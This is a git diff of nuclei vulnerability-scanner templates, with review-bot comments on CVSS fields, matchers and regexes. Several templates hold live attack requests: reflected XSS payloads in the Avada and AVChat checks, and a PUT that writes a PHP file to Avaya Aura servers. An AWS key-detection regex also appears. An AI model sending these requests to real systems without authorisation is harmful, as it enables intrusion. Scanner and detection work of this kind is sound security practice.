@@ -1,12 +1,16 @@ id: auto-usb-install info: - name: Auto USB Installation Enabled + name: Fortinet Auto USB Installation Enabled - Detect author: pussycat0x severity: info - description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port. + description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices - tags: fortigate,config,audit,firewall + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + tags: audit,config,file,firewall,fortigate file: - extensions: @@ -26,3 +30,4 @@ file: - "config router" - "config firewall" condition: or +# digest: 4a0a0047304502207705ba820df9f78c5d686bb2cf0a2945360c63e2774a2bd9984e2b676dfc3a71022100f9dc533ffa5f2fe96faee48a7249bf2982a55b89e7d5f40e7f49330d47dc5d2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/autobahn-python-detect-593.yaml b/nuclei-templates/Other/autobahn-python-detect-593.yaml deleted file mode 100644 index 7a9bc0b55d..0000000000 --- a/nuclei-templates/Other/autobahn-python-detect-593.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: autobahn-python-detect - -info: - name: Autobahn-Python Webserver Detect - author: pussycat0x - severity: info - metadata: - shodan-query: "AutobahnPython" - tags: tech,webserver - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: regex - regex: - - '
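Review bot: The new `classification:` in auto-usb-install.yaml pairs a CVSS:3.1 vector with `C:N/I:N/A:N` and `cvss-score: 0` with a rewritten description that says an attacker can obtain sensitive information, modify data and execute unauthorized operations; the two contradict each other. Other hunks in this commit (asus-router-panel, atlantis-detect, audiocodes-detect) remove `cvss-score: 0.0` lines rather than add them, so either drop `cvss-metrics`/`cvss-score` here and keep only `cwe-id`, or choose a vector that reflects the physical-access impact the description claims. The file matcher block is outside the hunk.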

AutobahnPython([ 0-9.]+)<\/h1>' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'AutobahnPython([ 0-9.]+)' diff --git a/nuclei-templates/Other/autobahn-python-detect-594.yaml b/nuclei-templates/Other/autobahn-python-detect-594.yaml new file mode 100644 index 0000000000..3a6054cc5a --- /dev/null +++ b/nuclei-templates/Other/autobahn-python-detect-594.yaml @@ -0,0 +1,29 @@ +id: autobahn-python-detect + +info: + name: Autobahn-Python Webserver Detect + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=%22AutobahnPython%22 + tags: tech,webserver + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: regex + regex: + - '

AutobahnPython([ 0-9.]+)<\/h1>' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'AutobahnPython([ 0-9.]+)' diff --git a/nuclei-templates/Other/automation-direct-596.yaml b/nuclei-templates/Other/automation-direct-597.yaml similarity index 100% rename from nuclei-templates/Other/automation-direct-596.yaml rename to nuclei-templates/Other/automation-direct-597.yaml diff --git a/nuclei-templates/Other/automatisch-panel.yaml b/nuclei-templates/Other/automatisch-panel.yaml index aa1ea97634..a9d888edee 100644 --- a/nuclei-templates/Other/automatisch-panel.yaml +++ b/nuclei-templates/Other/automatisch-panel.yaml @@ -10,9 +10,9 @@ info: - https://automatisch.io/ - https://github.com/automatisch/automatisch metadata: - verified: true max-request: 2 shodan-query: title:"Automatisch" + verified: true tags: panel,automatisch,detect http: @@ -32,5 +32,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f85f212b29469d97f61c4c2e2414bf38eeee56faf0acb325d485a83bb441097202200944819fa0dbd30f1490c609750d410dcadfc7dffac01b3a789515c2b25457a6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022035fe81f8489195b9067d4a0737e6e679ae53525803c06f578856012fdbdc1b100221008fd79bd81b27673d0a378a9f1cddf49f6c244e33a6087b2ee89cf09d85f71a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/autoptimize.yaml b/nuclei-templates/Other/autoptimize.yaml index d7831e6f61..1426ac3ef2 100644 --- a/nuclei-templates/Other/autoptimize.yaml +++ b/nuclei-templates/Other/autoptimize.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/autoset-detect.yaml b/nuclei-templates/Other/autoset-detect.yaml index 1a0a536627..d3d2b8c6d6 100644 --- a/nuclei-templates/Other/autoset-detect.yaml +++ b/nuclei-templates/Other/autoset-detect.yaml 
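Review bot: The new autobahn-python-detect-594.yaml drops the structured `metadata: shodan-query: "AutobahnPython"` that the deleted 593 copy carried and replaces it with a `reference:` pointing at a Shodan search URL; the query is the same, but anything that reads `shodan-query` from metadata loses it. Keep both: add `metadata:` with `  shodan-query: "AutobahnPython"` alongside the reference. The `<h1>` tag in the regex appears to have been swallowed by the page rendering in both the deleted and the new copy, so double-check that the regex survived the move intact in the actual file.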
@@ -7,9 +7,9 @@ info: reference: - http://autoset.net/xe/ metadata: - verified: true max-request: 1 shodan-query: title:"AutoSet" + verified: true tags: tech,php,autoset,apache http: @@ -36,4 +36,4 @@ http: group: 1 regex: - 'AutoSet (\d+(\.\d+)+)\b' -# digest: 490a0046304402205e24faf94cdcfc4943f6a3e61717745673990ed09e44dc9fa5cfdb2372d8912e02201a9c524f619681858711cdccb96931d8bb85bf7f03b9397d34c07b79576467e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008749f06172560522b858602a0ab2e051598a9f3730cb7dd05f1d5dffa07b0ffc022007b0555f10f4c2d96fd37b2ff258e1c9281c56f3550a0c62f8560e312618b290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/avada-xss.yaml b/nuclei-templates/Other/avada-xss.yaml index 803af86117..10c16dc9e1 100644 --- a/nuclei-templates/Other/avada-xss.yaml +++ b/nuclei-templates/Other/avada-xss.yaml @@ -12,9 +12,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + metadata: + max-request: 1 tags: xss,wp,wordpress,wp-theme,avada,wpscan -requests: +http: - method: GET path: - '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/' @@ -37,4 +39,4 @@ requests: status: - 200 -# Enhanced by md on 2022/09/19 +# digest: 4a0a00473045022064e31c0913ff1bc4e65e1f027df44639e9b19502f2f41947a9b4179b2b804f410221009669c137a359fe327d566e6063ef49869c187c7849ea8eb6f47f7f44b98d3afb:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/avatier-password-management-604.yaml b/nuclei-templates/Other/avatier-password-management-604.yaml new file mode 100644 index 0000000000..f6295f4159 --- /dev/null +++ b/nuclei-templates/Other/avatier-password-management-604.yaml 
@@ -0,0 +1,20 @@ +--- +id: avatier-password-management + +info: + name: Avatier Password Management Self Service Portal + author: praetorian-thendrickson + severity: info + tags: panel,avatier + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/' + + matchers-condition: and + matchers: + - type: word + words: + - '<title id="PageTitle">Password Management Client' + - '"LabelWelcomeToPS"' \ No newline at end of file diff --git a/nuclei-templates/Other/avatier-password-management-605.yaml b/nuclei-templates/Other/avatier-password-management-605.yaml deleted file mode 100644 index 62d6395e8a..0000000000 --- a/nuclei-templates/Other/avatier-password-management-605.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: avatier-password-management - -info: - name: Avatier Password Management Panel Detect - author: praetorian-thendrickson - severity: info - description: An Avatier password management panel was detected. - reference: - - https://www.avatier.com - metadata: - shodan-query: http.favicon.hash:983734701 - tags: panel,avatier - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/' - - matchers-condition: and - matchers: - - type: word - words: - - 'LabelWelcomeToPS' - - 'Avatier Corporation' - condition: and - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/avaya-aura-rce.yaml b/nuclei-templates/Other/avaya-aura-rce.yaml index c42e577b60..576d10ebe4 100644 --- a/nuclei-templates/Other/avaya-aura-rce.yaml +++ b/nuclei-templates/Other/avaya-aura-rce.yaml 
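Review bot: The word matcher lists two strings but sets no `condition`, so nuclei's default OR applies and a page whose title is just `Password Management Client` matches on its own, which is the generic half of the pair; add `condition: and` under `words:` as the deleted 605 copy had. With only one matcher, `matchers-condition: and` has nothing to combine; either drop it or add the status matcher it presumably anticipates, `- type: status` / `status:` / `- 200`. The file that survives also carries no `description`, `reference` or `classification`, while the copy this commit deletes did; consider keeping that metadata on the remaining file.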
@@ -4,15 +4,22 @@ info: name: Avaya Aura Utility Services Administration - Remote Code Execution author: DhiyaneshDk severity: critical + description: | + Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/ - https://download.avaya.com/css/public/documents/101076366 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-94 metadata: - verified: "true" + verified: true + max-request: 2 shodan-query: html:"Avaya Aura" - tags: rce,avaya,aura,iot + tags: rce,avaya,aura,iot,intrusive -requests: +http: - raw: - | PUT /PhoneBackup/{{randstr}}.php HTTP/1.1 @@ -20,8 +27,7 @@ requests: User-Agent: AVAYA Connection: close - System Manager ([a-z0-9.]+)
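Review bot: The added `description` says what the vulnerability allows but not what this template itself does: the request below it is a `PUT` of `{{randstr}}.php` to `/PhoneBackup/`, i.e. the check writes a file to the target, which the new `intrusive` tag signals only implicitly. State it in the description, e.g. `Note: this check uploads a randomly named PHP file under /PhoneBackup/ on the target.`, so scan-scope reviewers and asset owners see the side effect without reading the raw request. The raw request continues in the next hunk and past its end, so whether a cleanup request follows cannot be confirmed from here; if it does not, say so in the description as well.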

" - -# Enhanced by md on 2022/10/31 +# digest: 490a004630440220742c535fcf40b698ab4d4ac8550eecc886cdc968e67e6f78e7ac0d1dd3c602090220667eabb92d12f1e20876c1644b471fee43924eedcae0fd0a674e774d05a522e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/avchat-video-chat-xss.yaml b/nuclei-templates/Other/avchat-video-chat-xss.yaml index 0feaccd61a..e3a3d322ff 100644 --- a/nuclei-templates/Other/avchat-video-chat-xss.yaml +++ b/nuclei-templates/Other/avchat-video-chat-xss.yaml @@ -9,16 +9,16 @@ info: reference: - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/ - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 metadata: verified: true - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - tags: xss,,wp,wpscan,wordpress,wp-plugin + max-request: 1 + tags: xss,wp,wpscan,wordpress,wp-plugin - -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&" @@ -38,5 +38,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/07 +# digest: 490a00463044022002368646c707b96413ee07e487ea074e8d10a063907b76446f05c6c5efd75e9a022026a3f3fabe2061a078cf8d30212eb42aba57f2ead045e3d5805d6b6d460ddbd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aviatrix-panel-608.yaml b/nuclei-templates/Other/aviatrix-panel-608.yaml new file mode 100644 index 0000000000..e8c89b1cca --- /dev/null +++ b/nuclei-templates/Other/aviatrix-panel-608.yaml 
@@ -0,0 +1,31 @@ +id: aviatrix-panel + +info: + name: Aviatrix Panel Login + author: pikpikcu,philippedelteil,daffainfo + severity: info + metadata: + shodan-query: http.title:"Aviatrix Cloud Controller" + tags: panel,aviatrix + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/assets/img/favicon-32x32.png" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + name: "title" + condition: and + dsl: + - 'contains(body, "Aviatrix")' + - 'contains(body, "Controller")' + - 'status_code == 200' + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" diff --git a/nuclei-templates/Other/aviatrix-panel.yaml b/nuclei-templates/Other/aviatrix-panel.yaml deleted file mode 100644 index 9107535ba9..0000000000 --- a/nuclei-templates/Other/aviatrix-panel.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: aviatrix-panel - -info: - name: Aviatrix Cloud Controller Panel Login - author: pikpikcu,philippedelteil,daffainfo - severity: info - description: An Aviatrix Cloud Controller login panel was detected. - reference: - - https://docs.aviatrix.com/HowTos/controller_config.html - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Aviatrix Cloud Controller" - tags: panel,aviatrix - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/assets/img/favicon-32x32.png" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - name: "title" - condition: and - dsl: - - 'contains(body, "Aviatrix")' - - 'contains(body, "Controller")' - - 'status_code == 200' - - - type: dsl - name: "favicon" - dsl: - - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/avideo-detect.yaml b/nuclei-templates/Other/avideo-detect.yaml index 69da940439..2f299a1fd5 100644 --- a/nuclei-templates/Other/avideo-detect.yaml 
+++ b/nuclei-templates/Other/avideo-detect.yaml @@ -6,17 +6,19 @@ info: severity: info metadata: verified: true + max-request: 1 shodan-query: http.title:"AVideo" fofa-query: "AVideo" tags: tech,avideo -requests: +http: - method: GET path: - "{{BaseURL}}" host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex @@ -35,3 +37,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100cf44559df8ac7ad08f8773c5424774c8df0edec3ba3f0828d263691c32f7464d02206f3c7f5afe59bc26e4f49303b4893ceb02b31aa4cd6eb8173f7c5e8053c7c16b:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/avideo-install.yaml b/nuclei-templates/Other/avideo-install.yaml index 44577e0daa..9cbd284ecd 100644 --- a/nuclei-templates/Other/avideo-install.yaml +++ b/nuclei-templates/Other/avideo-install.yaml @@ -11,11 +11,12 @@ info: cwe-id: CWE-459 metadata: verified: true + max-request: 1 shodan-query: http.title:"AVideo" fofa-query: "AVideo" - tags: panel,install,avideo + tags: panel,install,avideo,misconfig -requests: +http: - method: GET path: - "{{BaseURL}}/install/index.php" @@ -27,8 +28,13 @@ requests: words: - 'Install AVideo' + - type: word + part: body + negative: true + words: + - 'Your system is installed, remove the' + - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4b0a00483046022100f6540411457d18242afa465a7b2ae500404d24cd51a1c8ccb353ca97c58aee24022100a88d1cf2a8087431f1b3761087fffff25c298d4ea251945ea74d1f4cc844685d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/AVideo-user-leakge.yaml b/nuclei-templates/Other/avideo-user-leakge.yaml similarity index 100% rename from nuclei-templates/Other/AVideo-user-leakge.yaml rename to nuclei-templates/Other/avideo-user-leakge.yaml diff --git a/nuclei-templates/Other/avigilon-panel.yaml b/nuclei-templates/Other/avigilon-panel.yaml index e2229f1ef2..e685f90c2b 100644 --- a/nuclei-templates/Other/avigilon-panel.yaml 
+++ b/nuclei-templates/Other/avigilon-panel.yaml @@ -7,14 +7,17 @@ info: description: Avigilon login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:avigilon:avigilon_control_center:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: avigilon_control_center shodan-query: http.title:"Login - Avigilon Control Center" + vendor: avigilon + verified: true tags: panel,avigilon -requests: +http: - method: GET path: - '{{BaseURL}}/cfg/login' @@ -36,5 +39,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/01 +# digest: 4b0a004830460221008a1100925f10bb7cfe702541f9583ad536cc6c872506c7491640e88651156dd5022100ec00500bb98ccd4e20c1c974b7df6f1fbdc4bd59a0be92da627e5e2279950f03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/avnil-pdf-generator-check.yaml b/nuclei-templates/Other/avnil-pdf-generator-check.yaml index 5b7bd4c129..44a798e2e9 100644 --- a/nuclei-templates/Other/avnil-pdf-generator-check.yaml +++ b/nuclei-templates/Other/avnil-pdf-generator-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,avnil-pdf,creds-stuffing + tags: cloud,creds-stuffing,login-check,avnil-pdf self-contained: true @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204b1e7e40c67c2247f9f558ddd4a992beee8ece82c1882a5e6c32181905e83489022048f5c5719753b894301591560cf8ce2b2b0d50dcb4fbfffa80a39bb0a96e7ab6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206b4fbc67413049130a87be6c047ed7ae4cb323da4b195608526619668e467272022100986ad99ae0c941bfef37cbd6df9fa30798f45445eaf38a1be2696c142122e7a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
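Review bot: Removing `cvss-score: 0.0` while keeping `cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N` leaves a vector whose impact is all-None, which is exactly what produced the 0.0; the classification is now half-deleted rather than corrected. Either remove the `cvss-metrics` line as well and keep only `cwe-id: CWE-200` plus the new `cpe`, or keep both vector and score. The same half-removal is made in axel-webserver.yaml (hunk `@@ -7,15 +7,15 @@`), whereas axigen-webadmin-660.yaml drops both lines, which is the consistent form.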
diff --git a/nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml b/nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml deleted file mode 100644 index 8bbb7ce6c5..0000000000 --- a/nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: avtech-avn801-camera-panel - -info: - name: Avtech AVN801 Network Camera Panel Detect - author: idealphase - severity: info - description: AVTECH offers a range of IP camera series with different shapes, resolutions and lens to fulfill different demands. Select the items needed to narrow down product search. - reference: http://www.avtech.com.tw - metadata: - shodan-query: title:"login" product:"Avtech AVN801 network camera" - tags: panel,avtech,iot,camera - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - "IP Surveillance for Your Life" - - "avtech" - - "/cgi-bin/guest/Login.cgi?rnd=" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/avtech-avn801-camera-panel.yaml b/nuclei-templates/Other/avtech-avn801-camera-panel.yaml new file mode 100644 index 0000000000..a36f8957c2 --- /dev/null +++ b/nuclei-templates/Other/avtech-avn801-camera-panel.yaml @@ -0,0 +1,32 @@ +id: avtech-avn801-camera-panel + +info: + name: Avtech AVN801 Network Camera - Admin Panel Detection + author: idealphase + severity: info + description: An Avtech AVN801 Network Camera administration panel was detected. + reference: + - http://www.avtech.com.tw + metadata: + shodan-query: title:"login" product:"Avtech AVN801 network camera" + tags: panel,avtech,iot,camera + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "IP Surveillance for Your Life" + - "avtech" + - "/cgi-bin/guest/Login.cgi?rnd=" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/22 
diff --git a/nuclei-templates/Other/AVTECH-login-bypass.yaml b/nuclei-templates/Other/avtech-login-bypass.yaml similarity index 100% rename from nuclei-templates/Other/AVTECH-login-bypass.yaml rename to nuclei-templates/Other/avtech-login-bypass.yaml diff --git a/nuclei-templates/Other/aws-access-id-620.yaml b/nuclei-templates/Other/aws-access-id-618.yaml similarity index 100% rename from nuclei-templates/Other/aws-access-id-620.yaml rename to nuclei-templates/Other/aws-access-id-618.yaml diff --git a/nuclei-templates/Other/aws-access-key-value-622.yaml b/nuclei-templates/Other/aws-access-key-value-622.yaml new file mode 100644 index 0000000000..52092fb630 --- /dev/null +++ b/nuclei-templates/Other/aws-access-key-value-622.yaml @@ -0,0 +1,18 @@ +id: aws-access-key-value + +info: + name: AWS Access Key ID Value + author: Swissky + severity: info + tags: exposure,token,aws,amazon + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" diff --git a/nuclei-templates/Other/aws-access-key-value-625.yaml b/nuclei-templates/Other/aws-access-key-value-625.yaml deleted file mode 100644 index b1f6dd5190..0000000000 --- a/nuclei-templates/Other/aws-access-key-value-625.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: aws-access-key-value - -info: - name: AWS Access Key ID Value - author: Swissky - severity: info - tags: exposure,token,aws,amazon - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - part: body - regex: - - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" diff --git a/nuclei-templates/Other/aws-access-secret-key.yaml b/nuclei-templates/Other/aws-access-secret-key.yaml index 8b3852ade1..edc3ab989d 100644 --- a/nuclei-templates/Other/aws-access-secret-key.yaml +++ b/nuclei-templates/Other/aws-access-secret-key.yaml 
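Review bot: The extractor regex `(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}` has no boundaries, so any longer run of upper-case alphanumerics that happens to contain one of the prefixes (upper-case stretches of base64, minified asset names) can be reported as a key ID, truncated to 20 characters. Anchoring both ends keeps the match to a standalone 20-character token: `- '\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b'`, using single quotes because `\b` inside a YAML double-quoted string is the backspace escape, not a regex boundary. Since this file is byte-identical to the aws-access-key-value-625.yaml the commit deletes, the fix belongs here rather than carrying the pattern over unchanged.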
@@ -5,10 +5,11 @@ info: author: tess severity: unknown metadata: - verified: "true" - tags: disclosure,aws,generic,exposure,amazon + verified: true + max-request: 1 + tags: disclosure,aws,exposure,amazon -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -26,3 +27,5 @@ requests: - type: status status: - 200 + +# digest: 4b0a00483046022100a18f27b205b0f4d3b502a4ad5a326cc65b76afe8be03898378095eb657a54250022100a2ccd7b2cc4d37ff5a84631a0feed54b5fb00f69b5ec7da55a1957a58e73020c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aws-bucket-takeover-630.yaml b/nuclei-templates/Other/aws-bucket-takeover-630.yaml index e0d78b9f0e..786b470805 100644 --- a/nuclei-templates/Other/aws-bucket-takeover-630.yaml +++ b/nuclei-templates/Other/aws-bucket-takeover-630.yaml @@ -1,19 +1,23 @@ id: aws-bucket-takeover + info: name: AWS Bucket Takeover Detection - author: pdcommunity + author: pdteam severity: high - tags: takeover,aws + tags: takeover,aws,bucket reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - "The specified bucket does not exist" + - type: dsl dsl: - contains(tolower(all_headers), 'x-guploader-uploadid') diff --git a/nuclei-templates/Other/aws-cloudfront-service-634.yaml b/nuclei-templates/Other/aws-cloudfront-service-634.yaml new file mode 100644 index 0000000000..26ab05d613 --- /dev/null +++ b/nuclei-templates/Other/aws-cloudfront-service-634.yaml 
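Review bot: The second matcher still requires `x-guploader-uploadid` in the response headers; that header is emitted by Google Cloud Storage, not by S3, whose error responses carry `x-amz-request-id` and `x-amz-id-2`, so with `matchers-condition: and` this AWS template is unlikely to fire on a genuinely dangling S3 bucket. The commit touches the file (author, tags, blank lines) without revisiting that check; if the intent is to confirm the response came from S3, `- contains(tolower(all_headers), 'x-amz-request-id')` is the corresponding condition, and if the GCS header is deliberate it needs a comment saying why. This is inferred from the header names; verify against a live S3 `NoSuchBucket` response before changing it.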
@@ -0,0 +1,22 @@ +id: aws-cloudfront-service + +info: + name: AWS Cloudfront service detection + author: jiheon-dev + severity: info + description: Detect websites using AWS cloudfront service + tags: aws,tech,service + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + condition: or + dsl: + - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-cloudfront-service.yaml b/nuclei-templates/Other/aws-cloudfront-service.yaml deleted file mode 100644 index b247e81533..0000000000 --- a/nuclei-templates/Other/aws-cloudfront-service.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aws-cloudfront-service - -info: - name: AWS Cloudfront service detection - author: jiheon-dev - severity: info - tags: aws,tech,service - description: Detect websites using AWS cloudfront service - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - condition: or - dsl: - - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-config.yaml b/nuclei-templates/Other/aws-config.yaml index 7e6889f667..47c84ecd77 100644 --- a/nuclei-templates/Other/aws-config.yaml +++ b/nuclei-templates/Other/aws-config.yaml @@ -9,9 +9,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure metadata: + verified: true max-request: 1 + tags: config,exposure,aws,credential http: - method: GET 
@@ -20,16 +21,18 @@ http: matchers-condition: and matchers: + - type: regex + regex: + - 'aws_access_key_id\s*=\s*' + - 'region\s*=\s*' + - type: word + part: body words: - - "[default]" - - - type: dsl - dsl: - - "!contains(tolower(body), 'AWS Elastic Beanstalk overview' - - '
  • AWS Elastic Beanstalk overview
  • ' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '([A-Za-z -]+)<\/title>' diff --git a/nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml b/nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml new file mode 100644 index 0000000000..532f1b9aee --- /dev/null +++ b/nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml @@ -0,0 +1,31 @@ +id: elastic-beanstalk-detect + +info: + name: AWS Elastic Beanstalk Detect + author: pussycat0x + severity: info + tags: aws,tech,beanstalk + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - '<li><a href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic Beanstalk overview</a></li>' + - '<li><a href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk overview</a></li>' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '<title>([A-Za-z -]+)<\/title>' diff --git a/nuclei-templates/Other/aws-opensearch-login-649.yaml b/nuclei-templates/Other/aws-opensearch-login-649.yaml index 14f111d73a..5e1bc2b728 100644 --- a/nuclei-templates/Other/aws-opensearch-login-649.yaml +++ b/nuclei-templates/Other/aws-opensearch-login-649.yaml @@ -1,5 +1,4 @@ id: aws-opensearch-login - info: name: AWS OpenSearch Default Login author: Higor Melgaço (eremit4) @@ -8,18 +7,15 @@ info: reference: - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ tags: panel,opensearch,aws - requests: - method: GET path: - '{{BaseURL}}/_dashboards/app/login' - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - - "Please login to OpenSearch Dashboards" \ No newline at end of file + - "Please login to OpenSearch Dashboards" 
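Review bot: The new file's `id: elastic-beanstalk-detect` does not match the filename `aws-elastic-beanstalk-detect.yaml`; every other template in this commit keeps the two identical, and the id is what appears in results and in `-id` filters, so set `id: aws-elastic-beanstalk-detect`. The word matcher depends on two complete `<li><a href=…>…</a></li>` strings, which break on any markup change in the default page; matching the documentation link target or the `AWS Elastic Beanstalk overview` text alone, with `condition: or` kept, would be more robust. That second point is fragility rather than a defect.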
